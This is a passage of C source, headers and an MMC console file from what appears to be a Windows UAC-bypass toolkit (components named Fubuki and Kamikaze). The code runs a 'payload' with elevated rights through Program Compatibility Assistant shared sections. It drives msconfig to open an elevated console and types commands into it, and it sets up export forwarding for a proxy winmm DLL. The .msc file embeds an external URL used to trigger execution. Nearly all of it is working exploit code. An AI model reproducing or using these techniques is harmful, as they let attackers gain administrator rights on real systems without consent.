ViewUnmap,\n MEM_TOP_DOWN,\n PAGE_READWRITE);\n\n if (NT_SUCCESS(ntStatus) && pvLoaderBlock && viewSize >= sizeof(PCA_LOADER_BLOCK)) {\n\n RtlSecureZeroMemory(&szLoader, sizeof(szLoader));\n _strncpy(szLoader, MAX_PATH, pvLoaderBlock->szLoader, MAX_PATH);\n\n ucmDbgMsg(L\"[PCADLL] NtMapViewOfSection success\\r\\n\");\n\n RtlSecureZeroMemory(&szName, sizeof(szName));\n _strcpy(szObjectName, L\"\\\\BaseNamedObjects\\\\\");\n ucmGenerateSharedObjectName(FUBUKI_PCA_EVENT_ID, szName);\n _strcat(szObjectName, szName);\n\n RtlInitUnicodeString(&usName, szObjectName);\n InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n if (NT_SUCCESS(NtOpenEvent(&hSharedEvent, EVENT_MODIFY_STATE, &obja))) {\n\n //\n // Read shared params block.\n //\n RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n if (bSharedParamsReadOk) {\n ucmDbgMsg(L\"[PCADLL] Shared parameters read OK\\r\\n\");\n lpParameter = g_SharedParams.szParameter;\n cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n }\n else {\n ucmDbgMsg(L\"[PCADLL] Shared parameters defaulted\\r\\n\");\n lpParameter = NULL;\n cbParameter = 0UL;\n }\n\n //\n // Reset windir environment variable.\n //\n ucmSetEnvironmentVariable(T_WINDIR, USER_SHARED_DATA->NtSystemRoot);\n\n //\n // Run payload.\n //\n if (ucmLaunchPayload(lpParameter, cbParameter)) {\n ucmDbgMsg(L\"[PCADLL] Payload executed OK\\r\\n\");\n pvLoaderBlock->OpResult = FUBUKI_PCA_PAYLOAD_RUN;\n }\n else {\n ucmDbgMsg(L\"[PCADLL] Error during payload execution\\r\\n\");\n }\n\n //\n // Restart loader with \"2\" param.\n //\n RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));\n\n startupInfo.cb = sizeof(startupInfo);\n\n //\n // Set loader command line.\n //\n szLoaderCmdLine[0] = TEXT('2');\n szLoaderCmdLine[1] = 0;\n\n if (CreateProcess(\n szLoader,\n szLoaderCmdLine,\n NULL,\n NULL,\n FALSE,\n CREATE_NO_WINDOW,\n NULL,\n NULL,\n &startupInfo,\n &processInfo))\n {\n ucmDbgMsg(L\"[PCADLL] Loader run OK\\r\\n\");\n\n CloseHandle(processInfo.hThread);\n CloseHandle(processInfo.hProcess);\n pvLoaderBlock->OpResult |= FUBUKI_PCA_LOADER_RUN;\n }\n else {\n ucmDbgMsg(L\"[PCADLL] Error during loader execution\\r\\n\");\n }\n\n NtSetEvent(hSharedEvent, NULL);\n NtClose(hSharedEvent);\n ucmDbgMsg(L\"[PCADLL] Shared event signaled\\r\\n\");\n\n //\n // Notify Akagi.\n //\n if (bSharedParamsReadOk) {\n ucmSetCompletion(g_SharedParams.szSignalObject);\n }\n\n }\n else {\n ucmDbgMsg(L\"[PCADLL] NtOpenEvent failed\\r\\n\");\n }\n\n NtUnmapViewOfSection(NtCurrentProcess(), pvLoaderBlock);\n\n }\n else {\n ucmDbgMsg(L\"[PCADLL] MapViewOfFile failed\\r\\n\");\n }\n\n NtClose(hSharedSection);\n\n }\n else {\n ucmDbgMsg(L\"[PCADLL] OpenFileMapping failed\\r\\n\");\n }\n\n }\n\n return TRUE;\n}\n"
},
{
"path": "Source/Fubuki/pca.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2021\n*\n* TITLE: PCA.H\n*\n* VERSION: 3.56\n*\n* DATE: 19 July 2021\n*\n* Fubuki Program Compatibility Assistant related code header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef struct _PCA_LOADER_BLOCK {\n ULONG OpResult;\n WCHAR szLoader[MAX_PATH + 1];\n} PCA_LOADER_BLOCK, * PPCA_LOADER_BLOCK;\n"
},
{
"path": "Source/Fubuki/resource.h",
"content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by version.rc\n//\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE 103\n#define _APS_NEXT_COMMAND_VALUE 40001\n#define _APS_NEXT_CONTROL_VALUE 1001\n#define _APS_NEXT_SYMED_VALUE 101\n#endif\n#endif\n"
},
{
"path": "Source/Fubuki/uihacks.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2019 - 2025\n*\n* TITLE: UIHACKS.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"fubuki.h\"\n\n//#define FUBUKI_TRACE_CALL\n\n#ifdef FUBUKI_TRACE_CALL\nVOID ucmxSendInput(\n _In_ UINT cInputs, \n _In_reads_(cInputs) LPINPUT pInputs,\n _In_ int cbSize)\n{\n WCHAR szOut[200];\n UINT r = SendInput(cInputs, pInputs, cbSize);\n\n _strcpy(szOut, L\"SendInput = \");\n ultostr(r, _strend(szOut));\n _strcat(szOut, L\" GetLastError = \");\n ultostr(GetLastError(), _strend(szOut));\n _strcat(szOut, L\"\\r\\n\");\n OutputDebugString(szOut);\n}\n#else\n#define ucmxSendInput SendInput\n#endif\n\n/*\n* ucmxSendControlInput\n*\n* Purpose:\n*\n* Send keyboard input to the foreground window with optional shift key.\n*\n*/\nVOID ucmxSendControlInput(\n _In_ WORD VkKey,\n _In_ BOOL UseShift)\n{\n INPUT ip;\n\n ip.type = INPUT_KEYBOARD;\n ip.ki.wScan = 0;\n ip.ki.time = 0;\n ip.ki.dwExtraInfo = 0;\n ip.ki.dwFlags = 0;\n\n if (UseShift) {\n ip.ki.wVk = VK_LSHIFT;\n ucmxSendInput(1, &ip, sizeof(INPUT));\n }\n\n ip.ki.wVk = VkKey;\n ucmxSendInput(1, &ip, sizeof(INPUT));\n\n ip.ki.dwFlags = KEYEVENTF_KEYUP;\n ucmxSendInput(1, &ip, sizeof(INPUT));\n\n if (UseShift) {\n ip.ki.wVk = VK_LSHIFT;\n ip.ki.dwFlags = KEYEVENTF_KEYUP;\n ucmxSendInput(1, &ip, sizeof(INPUT));\n }\n}\n\n/*\n* ucmxSendKeys\n*\n* Purpose:\n*\n* Send a sequence of keystrokes to the foreground window.\n*\n*/\nVOID ucmxSendKeys(\n _In_ LPWSTR lpString)\n{\n BOOL NeedShift;\n SIZE_T i;\n WORD VkAndShift;\n\n HKL kl = LoadKeyboardLayout(TEXT(\"en-US\"), KLF_ACTIVATE);\n\n for (i = 0; i < _strlen(lpString); i++) {\n VkAndShift = VkKeyScanEx(lpString[i], kl);\n NeedShift = ((HIBYTE(VkAndShift) & 1) == 1);\n ucmxSendControlInput(LOBYTE(VkAndShift), NeedShift);\n }\n}\n\n/*\n* ucmxElevatedConsoleCallback\n*\n* Purpose:\n*\n* Callback used to locate window of elevated console.\n*\n*/\nBOOL CALLBACK ucmxElevatedConsoleCallback(\n _In_ HWND hwnd,\n _In_ LPARAM lParam\n)\n{\n BOOL Elevated = FALSE;\n DWORD dwPid;\n LPWSTR lpPayload = (LPWSTR)lParam;\n WCHAR szBuffer[MAX_PATH + 1];\n\n if (GetClassName(hwnd, (LPWSTR)szBuffer, MAX_PATH)) {\n if (_strcmpi(szBuffer, TEXT(\"ConsoleWindowClass\")) == 0) {\n if (GetWindowThreadProcessId(hwnd, &dwPid)) {\n if (NT_SUCCESS(ucmIsProcessElevated(dwPid, &Elevated))) {\n if (Elevated) {\n ucmxSendKeys(lpPayload);\n ucmxSendControlInput(VK_RETURN, FALSE);\n return TRUE;\n }\n }\n }\n }\n }\n\n return FALSE;\n}\n\n/*\n* ucmxEnumChildCallback\n*\n* Purpose:\n*\n* EnumChildWindows callback used to send keys to msconfig and cmd.\n*\n*/\nBOOL CALLBACK ucmxEnumChildCallback(\n _In_ HWND hwnd,\n _In_ LPARAM lParam\n)\n{\n UINT i;\n HWND hwndButton, hwndList;\n\n //\n // Find msconfig tools listview.\n //\n hwndList = FindWindowEx(hwnd, NULL, TEXT(\"SysListView32\"), TEXT(\"List1\"));\n if (hwndList) {\n\n //SetFocus(hwndList);\n\n //\n // Navigate to cmd.exe entry in msconfig listview.\n //\n for (i = 0; i < 14; i++) {\n ucmxSendControlInput(VK_DOWN, FALSE);\n }\n\n hwndButton = GetDlgItem(hwnd, 302);\n if (hwndButton == NULL)\n hwndButton = GetDlgItem(hwnd, 1117);\n\n if (hwndButton) {\n\n //\n // Navigate to \"Launch\" button.\n //\n ucmxSendControlInput(VK_TAB, FALSE);\n ucmxSendControlInput(VK_TAB, FALSE);\n\n //\n // Press \"Launch\" button.\n //\n ucmxSendControlInput(VK_RETURN, FALSE);\n Sleep(1000);\n //\n // Send input to elevated console.\n //\n ucmxElevatedConsoleCallback(GetForegroundWindow(), lParam);\n\n return FALSE;\n }\n#ifdef FUBUKI_TRACE_CALL\n else {\n OutputDebugString(L\"GetDlgItem(BUTTON) failed\\r\\n\");\n }\n#endif\n }\n\n return TRUE;\n}\n\n/*\n* ucmxFindMainMsConfigWindow\n*\n* Purpose:\n*\n* EnumWindows callback used to locate msconfig dialog window.\n*\n*/\nBOOL CALLBACK ucmxFindMainMsConfigWindow(\n _In_ HWND hwnd,\n _In_ LPARAM lParam\n)\n{\n PSEARCH_WND SearchWnd = (PSEARCH_WND)lParam;\n\n WCHAR szClassName[MAX_PATH * 2];\n\n DWORD dwPid;\n DWORD dwTargetPid = SearchWnd->ProcessId;\n\n GetWindowThreadProcessId(hwnd, &dwPid);\n if (dwPid == dwTargetPid) {\n\n if (GetClassName(hwnd, szClassName, MAX_PATH)) {\n\n if (_strcmpi(szClassName, TEXT(\"#32770\")) == 0) {\n SearchWnd->hWnd = hwnd;\n return FALSE;\n }\n }\n }\n\n return TRUE;\n}\n\n/*\n* ucmxGetHwndForMsConfig\n*\n* Purpose:\n*\n* Return dialog hwnd of msconfig.\n*\n*/\nHWND ucmxGetHwndForMsConfig(\n _In_ ULONG ProcessId\n)\n{\n SEARCH_WND SearchWnd;\n\n SearchWnd.ProcessId = ProcessId;\n SearchWnd.hWnd = NULL;\n if (!EnumWindows(ucmxFindMainMsConfigWindow, (LPARAM)&SearchWnd)) {\n return SearchWnd.hWnd;\n }\n return NULL;\n}\n\n/*\n* ucmUIHackExecute\n*\n* Purpose:\n*\n* Force msconfig to spawn elevated cmd copy via gui-hack and gui-hack it too.\n*\n*/\nVOID ucmUIHackExecute(\n _In_ LPWSTR lpPayload\n)\n{\n HWND hwndDlg;\n SHELLEXECUTEINFO shinfo;\n PROCESS_BASIC_INFORMATION pbi;\n WCHAR szBuffer[MAX_PATH * 2];\n\n _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);\n _strcat(szBuffer, SYSTEM32_DIR);\n _strcat(szBuffer, MSCONFIG_EXE);\n\n RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n shinfo.cbSize = sizeof(shinfo);\n shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n shinfo.lpFile = szBuffer;\n shinfo.lpParameters = TEXT(\"-5\");\n shinfo.nShow = SW_SHOW;\n if (ShellExecuteEx(&shinfo)) {\n\n RtlSecureZeroMemory(&pbi, sizeof(PROCESS_BASIC_INFORMATION));\n if (NT_SUCCESS(NtQueryInformationProcess(shinfo.hProcess,\n ProcessBasicInformation,\n (PVOID)&pbi,\n sizeof(PROCESS_BASIC_INFORMATION),\n NULL)))\n {\n Sleep(1000);\n hwndDlg = ucmxGetHwndForMsConfig((ULONG)pbi.UniqueProcessId);\n if (hwndDlg) {\n EnumChildWindows(hwndDlg, ucmxEnumChildCallback, (LPARAM)lpPayload);\n }\n }\n\n TerminateProcess(shinfo.hProcess, 0);\n CloseHandle(shinfo.hProcess);\n }\n}\n\n/*\n* ucmUIHackExecute2\n*\n* Purpose:\n*\n* GUI hack target program via sending F1 key.\n*\n*/\nVOID ucmUIHackExecute2(\n VOID\n)\n{\n INPUT ip;\n ULONG iRetry = 5;\n SHELLEXECUTEINFO shinfo;\n WCHAR szBuffer[MAX_PATH * 2];\n\n HWND hwnd;\n\n _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);\n _strcat(szBuffer, SYSTEM32_DIR);\n _strcat(szBuffer, MMC_EXE);\n\n RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n shinfo.cbSize = sizeof(shinfo);\n shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n shinfo.lpFile = szBuffer;\n shinfo.lpParameters = EVENTVWR_MSC;\n shinfo.nShow = SW_SHOW;\n if (ShellExecuteEx(&shinfo)) {\n\n do {\n hwnd = FindWindow(L\"MMCMainFrame\", NULL);\n if (hwnd)\n break;\n else {\n Sleep(1000);\n }\n } while (--iRetry);\n\n if (hwnd) {\n\n SetForegroundWindow(hwnd);\n\n ip.type = INPUT_KEYBOARD;\n ip.ki.wScan = 0;\n ip.ki.time = 0;\n ip.ki.dwExtraInfo = 0;\n ip.ki.dwFlags = 0;\n\n ip.ki.wVk = VK_F1;\n ucmxSendInput(1, &ip, sizeof(INPUT));\n Sleep(1000);\n }\n else {\n ucmDbgMsg(L\"MMCMainFrame window not found\\r\\n\");\n }\n\n TerminateProcess(shinfo.hProcess, 0);\n CloseHandle(shinfo.hProcess);\n }\n}\n"
},
{
"path": "Source/Fubuki/uihacks.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2019 - 2024\n*\n* TITLE: UIHACKS.H\n*\n* VERSION: 3.66\n*\n* DATE: 03 Apr 2024\n*\n* Fubuki UIAccess related code header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef struct _SEARCH_WND {\n HWND hWnd;\n ULONG ProcessId;\n} SEARCH_WND, *PSEARCH_WND;\n\nVOID ucmUIHackExecute(\n _In_ LPWSTR lpPayload);\n\nVOID ucmUIHackExecute2(\n VOID);\n"
},
{
"path": "Source/Fubuki/winmm.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018\n*\n* TITLE: WINMM.H\n*\n* VERSION: 3.04\n*\n* DATE: 10 Nov 2018\n*\n* WINMM forwarded import.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#pragma comment(linker, \" /EXPORT:timeBeginPeriod=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeBeginPeriod\")\n#pragma comment(linker, \" /EXPORT:timeEndPeriod=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeEndPeriod\")\n#pragma comment(linker, \" /EXPORT:waveOutGetNumDevs=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetNumDevs\")\n#pragma comment(linker, \" /EXPORT:midiInMessage=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiInMessage\")\n#pragma comment(linker, \" /EXPORT:midiOutGetErrorTextW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutGetErrorTextW\")\n#pragma comment(linker, \" /EXPORT:midiOutGetNumDevs=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutGetNumDevs\")\n#pragma comment(linker, \" /EXPORT:midiOutMessage=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutMessage\")\n#pragma comment(linker, \" /EXPORT:midiOutPrepareHeader=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutPrepareHeader\")\n#pragma comment(linker, \" /EXPORT:midiOutReset=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutReset\")\n#pragma comment(linker, \" /EXPORT:midiOutUnprepareHeader=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiOutUnprepareHeader\")\n#pragma comment(linker, \" /EXPORT:midiStreamClose=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamClose\")\n#pragma comment(linker, \" /EXPORT:midiStreamOpen=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamOpen\")\n#pragma comment(linker, \" /EXPORT:midiStreamOut=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamOut\")\n#pragma comment(linker, \" /EXPORT:midiStreamPause=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamPause\")\n#pragma comment(linker, \" /EXPORT:midiStreamPosition=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamPosition\")\n#pragma comment(linker, \" /EXPORT:midiStreamProperty=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamProperty\")\n#pragma comment(linker, \" /EXPORT:midiStreamRestart=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamRestart\")\n#pragma comment(linker, \" /EXPORT:mixerGetControlDetailsW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetControlDetailsW\")\n#pragma comment(linker, \" /EXPORT:mixerGetDevCapsW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetDevCapsW\")\n#pragma comment(linker, \" /EXPORT:mixerGetLineControlsW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetLineControlsW\")\n#pragma comment(linker, \" /EXPORT:mixerGetLineInfoW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetLineInfoW\")\n#pragma comment(linker, \" /EXPORT:mixerGetNumDevs=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetNumDevs\")\n#pragma comment(linker, \" /EXPORT:mixerSetControlDetails=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerSetControlDetails\")\n#pragma comment(linker, \" /EXPORT:PlaySoundW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.PlaySoundW\")\n#pragma comment(linker, \" /EXPORT:timeGetDevCaps=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeGetDevCaps\")\n#pragma comment(linker, \" /EXPORT:timeGetTime=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeGetTime\")\n#pragma comment(linker, \" /EXPORT:timeKillEvent=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeKillEvent\")\n#pragma comment(linker, \" /EXPORT:timeSetEvent=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeSetEvent\")\n#pragma comment(linker, \" /EXPORT:waveInMessage=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveInMessage\")\n#pragma comment(linker, \" /EXPORT:waveOutClose=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutClose\")\n#pragma comment(linker, \" /EXPORT:waveOutGetDevCapsW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetDevCapsW\")\n#pragma comment(linker, \" /EXPORT:waveOutGetErrorTextW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetErrorTextW\")\n#pragma comment(linker, \" /EXPORT:waveOutGetPosition=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetPosition\")\n#pragma comment(linker, \" /EXPORT:waveOutGetVolume=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetVolume\")\n#pragma comment(linker, \" /EXPORT:waveOutMessage=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutMessage\")\n#pragma comment(linker, \" /EXPORT:waveOutOpen=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutOpen\")\n#pragma comment(linker, \" /EXPORT:waveOutPause=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutPause\")\n#pragma comment(linker, \" /EXPORT:waveOutPrepareHeader=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutPrepareHeader\")\n#pragma comment(linker, \" /EXPORT:waveOutReset=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutReset\")\n#pragma comment(linker, \" /EXPORT:waveOutRestart=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutRestart\")\n#pragma comment(linker, \" /EXPORT:waveOutSetVolume=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutSetVolume\")\n#pragma comment(linker, \" /EXPORT:waveOutUnprepareHeader=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutUnprepareHeader\")\n#pragma comment(linker, \" /EXPORT:waveOutWrite=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutWrite\")\n"
},
{
"path": "Source/Kamikaze/Kamikaze.msc",
"content": "\n {D0918FB2-FDF5-4A21-A323-32DC7F4D67FE}\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n {C96401CF-0E17-11D3-885B-00C04F72C717}\n \n \n \n \n \n {C96401CF-0E17-11D3-885B-00C04F72C717}\n \n \n \n \n \n \n \n \n \n \n \n \n {C96401CC-0E17-11D3-885B-00C04F72C717}\n \n \n \n \n \n \n \n \n \n \n \n {00000000-0000-0000-0000-000000000000}\n \n \n \n {00000000-0000-0000-0000-000000000000}\n \n \n \n \n \n \n {71E5B33E-1064-11D2-808F-0000F875A9CE}\n \n Favorites\n Shockwave Flash Object\n https://hfiref0x.github.io/Beacon/uac/exec\n Console Root\n \n \n \n \n \nSUwBAQIABAAMABAAEAD/////IRD//////////0JNNgAAAAAAAAA2AAAAKAAAAEAAAAAQAAAAAQAg\nAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAACcnJ0tqamrJS0tLqgkJCRoAAAAAAAAAALSzs/+rq6v/\nqqqq/6ioqP+op6f/p6en/6ampv+mpqb/pKSk/6Ojo/8nJydLampqyUtLS6oJCQkaAAAAAAAAAAC0\ns7P/q6ur/6qqqv+oqKj/qKen/6enp/+mpqb/pqam/6SkpP+jo6P/AAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACJiYnW\nvLy8/6Wlpf+BgID/lZSU/5WUlP+2tLT/1NHR+dTR0fnU0dH51NHR+dTT0fnU09H51dPR+c/OzfKk\npKT/iYmJ1ry8vP+lpaX/gYCA/5WUlP+VlJT/trS0/9TR0fnU0dH51NHR+dTR0fnU09H51NPR+dXT\n0fnPzs3ypKSk/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgYGBvNzc3P+1tbX/paCf/8a9vP/Gvbz/uLe3/9XS0f/N\nycn/zcnJ/83Jyf/Nycn/zcnJ/83Jyf/U0dH6pqam/4GBgbzc3Nz/tbW1/6Wgn//Gvbz/xr28/7i3\nt//V0tH/zcnJ/83Jyf/Nycn/zcnJ/83Jyf/Nycn/1NHR+qampv8AAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcXFyZW\nVlaTOTk5dgQEBAgAAAAAAAAAALm4uP/Z1tb/zMjI/8zIyP/MyMj/zMjI/8zIyP/MyMf/0c3N+aam\npv8XFxcmVlZWkzk5OXYEBAQIAAAAAAAAAAC5uLj/2dbW/8zIyP/MyMj/zMjI/8zIyP/MyMj/zMjH\n/9HNzfmmpqb/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8u7v/2NbV/8vH\nxf/Lx8X/y8fF/8vHxf/Lx8X/ycfF/9DMzPmnp6f/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvLu7\n/9jW1f/Lx8X/y8fF/8vHxf/Lx8X/y8fF/8nHxf/QzMz5p6en/wAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUF\nBQsBAQEEAAAAAAAAAAAAAAAAvb28/9jV1P/JxcT/ycXE/8nFxP/JxcT/ycXE/8nExP/Py8v5qKio\n/wAAAAAFBQULAQEBBAAAAAAAAAAAAAAAAL29vP/Y1dT/ycXE/8nFxP/JxcT/ycXE/8nFxP/JxMT/\nz8vL+aioqP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMF15eXneWVlZwQwMDCQAAAAAAAAAAMC/v//Y1NT/ycTE\n/8nExP/JxMT/ycTE/8nExP/IxMT/z8vL+aqoqP8wMDBdeXl53llZWcEMDAwkAAAAAAAAAADAv7//\n2NTU/8nExP/JxMT/ycTE/8nExP/JxMT/yMTE/8/Ly/mqqKj/AAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACPj4/cwsLC\n/6qqqv+AgID/lZSU/5WUlP/DwcD/2NXU/8nExP/JxMT/ycTE/8nExP/JxMT/yMTE/8/Ly/mrqqr/\nj4+P3MLCwv+qqqr/gICA/5WUlP+VlJT/w8HA/9jV1P/JxMT/ycTE/8nExP/JxMT/ycTE/8jExP/P\ny8v5q6qq/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAdnZ2rdvb2/+ysrL/qaOj/8a9vP/Gvbz/0M3M/+Hg4P/h3t7/\n4N3e/+Dd3f/e3Nz/3trc/93a2v/g3d3/trS0/3Z2dq3b29v/srKy/6mjo//Gvbz/xr28/9DNzP/h\n4OD/4d7e/+Dd3v/g3d3/3tzc/97a3P/d2tr/4N3d/7a0tP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA